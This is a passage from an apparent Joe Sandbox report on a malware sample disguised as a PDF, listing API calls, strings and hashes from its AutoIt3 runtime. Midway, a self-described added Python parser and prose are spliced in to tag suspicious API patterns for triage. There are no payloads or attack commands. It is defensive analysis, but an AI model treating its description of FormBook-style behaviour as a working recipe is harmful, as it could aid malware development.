                              • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                              APIs
                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                              • ReleaseCapture.USER32 ref: 0047116F
                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 2483343779-2107944366
                              • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                              • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                              APIs
                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                              • _wcslen.LIBCMT ref: 00450720
                              • _wcscat.LIBCMT ref: 00450733
                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$Window_wcscat_wcslen
                              • String ID: -----$SysListView32
                              • API String ID: 4008455318-3975388722
                              • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                              • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                              • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                              • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                              • GetParent.USER32 ref: 00469C98
                              • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                              • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                              • GetParent.USER32 ref: 00469CBC
                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$CtrlParent$_memmove_wcslen
                              • String ID: ComboBox$ListBox
                              • API String ID: 2360848162-1403004172
                              • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                              • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                              • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                              • String ID:
                              • API String ID: 262282135-0
                              • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                              • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                              • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                              APIs
                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                              • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                              • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                              • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                              • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                              APIs
                                • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                              • SendMessageW.USER32(75A523D0,00001001,00000000,?), ref: 00448E16
                              • SendMessageW.USER32(75A523D0,00001026,00000000,?), ref: 00448E25
                                • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                              • String ID:
                              • API String ID: 3771399671-0
                              • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                              • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                              • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 00434643
                              • GetForegroundWindow.USER32(00000000), ref: 00434655
                              • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                              • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                              • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                              • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                              • String ID:
                              • API String ID: 2156557900-0
                              • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                              • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                              • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
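The function records in this execution-graph section are flat bullet lists, so it is slow to see which of the many functions deserve attention. The Python below is an added example, not part of the Joe Sandbox report or of any Joe Sandbox export tooling: it parses records in the layout shown on this page into structured objects and tags each one. The AutoIt3 markers it looks for are well-known AutoIt identifiers that occur in this section (the `AU3_FreeVar` plugin export, the `@GUI_DRAGFILE` and `@GUI_DROPID` macros, the `%s (%d) : ==> %s: %s %s` runtime error format, and the `CLASSNN` / `REGEXPCLASS` window-descriptor keywords), which identify the image at 0x400000 in process 6 as AutoIt3 script-runtime code. The tag names, the `SAMPLE` input (records copied in the page's layout) and the `PLACEHOLDER` fuzzy hash are constructed for this example.

```python
"""Parse Joe Sandbox execution-graph function records ('• Api.MODULE(args), ref:' blocks)
into structured data and tag AutoIt3 runtime markers. Added example; SAMPLE mirrors the page."""
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
STRING_LINE = re.compile(r"^•\s*(?P<text>.*?),\s*xrefs:\s*[0-9A-Fa-f]{8}$")
FIELD_LINE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# Well-known AutoIt3 identifiers seen in this section: plugin export, GUI macros,
# runtime error format, window-descriptor keywords. They mark interpreter code.
AUTOIT_STRINGS = {"AU3_FreeVar", "@GUI_DRAGFILE", "@GUI_DROPID",
                  "%s (%d) : ==> %s: %s %s", "CLASSNN", "REGEXPCLASS"}
FOCUS_STEAL = {"GetForegroundWindow", "GetWindowThreadProcessId", "AttachThreadInput"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""          # set when the line reads 'Part of subcall function X'

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    def api_names(self) -> list:
        return list(dict.fromkeys(a.name for a in self.apis))   # unique, in order

def parse_records(text: str) -> list:
    """Split the flat listing into FunctionRecords; a record ends at its fuzzy hash."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line
        elif section == "APIs" and (m := API_LINE.match(line)):
            args = [a for a in (m["args"] or "").split(",") if a]
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] or ""))
        elif section == "Strings" and (m := STRING_LINE.match(line)):
            cur.strings.append(m["text"])
        elif m := FIELD_LINE.match(line):
            cur.fields[m["key"]] = m["value"]
            if m["key"] == "String ID":                 # '$'-joined copy of the strings
                cur.strings += [s for s in m["value"].split("$") if s and s not in cur.strings]
            elif m["key"] == "Instruction Fuzzy Hash":  # last field of every record
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records

def classify(rec: FunctionRecord) -> list:
    """Tags for AutoIt markers and for API patterns an analyst should not skip."""
    tags, names = [], set(rec.api_names())
    if AUTOIT_STRINGS & set(rec.strings):
        tags.append("autoit-runtime-string")
    if FOCUS_STEAL <= names:      # attaches to the foreground thread's input queue
        tags.append("focus-steal:AttachThreadInput")
    if "GetAsyncKeyState" in names:
        tags.append("key-state-poll")
    if {"CLSIDFromProgID", "CoCreateInstance"} <= names:   # ProgID -> CLSID -> object
        tags.append("com-object-create")
    return tags

# Constructed input: three records copied in the page's layout (the last fuzzy hash
# is a placeholder because the page truncates that record).
SAMPLE = """\
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
• CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
Similarity
• String ID: Failed to create object$Invalid parameter
• Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
Similarity
• String ID:
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
APIs
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0043409C
Similarity
• String ID: %s (%d) : ==> %s: %s %s
• Instruction Fuzzy Hash: PLACEHOLDER
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(", ".join(classify(rec)) or "untagged", "|", " ".join(rec.api_names()), "|", rec.strings)
```

The focus-steal tag covers the GetCurrentThreadId / GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput sequence in the record directly above: the caller attaches its own thread to the input queue of the foreground window's thread, which is how a GUI-automation runtime takes focus before it sends input. Records that carry only runtime markers can be deprioritised during triage so that time goes to the memory regions the report's FormBook, injection and credential-theft signatures point at.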
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                              • API String ID: 0-1603158881
                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                              APIs
                              • CreateMenu.USER32 ref: 00448603
                              • SetMenu.USER32(?,00000000), ref: 00448613
                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                              • IsMenu.USER32(?), ref: 004486AB
                              • CreatePopupMenu.USER32 ref: 004486B5
                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                              • DrawMenuBar.USER32 ref: 004486F5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                              • String ID: 0
                              • API String ID: 161812096-4108050209
                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\Product Data Specifications_PDF.exe), ref: 00434057
                              • LoadStringW.USER32(00000000), ref: 00434060
                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                              • LoadStringW.USER32(00000000), ref: 00434078
                              • _wprintf.LIBCMT ref: 004340A1
                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                              Strings
                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                              • C:\Users\user\Desktop\Product Data Specifications_PDF.exe, xrefs: 00434040
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString$Message_wprintf
                              • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                              • API String ID: 3648134473-1500177932
                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2498e882bfae39c3afa9084c8f54e08e1e98e57ddebf6092a9f935a5e62d1db
                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                              • Opcode Fuzzy Hash: a2498e882bfae39c3afa9084c8f54e08e1e98e57ddebf6092a9f935a5e62d1db
                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                              APIs
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,0040F545,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,004A90E8,C:\Users\user\Desktop\Product Data Specifications_PDF.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
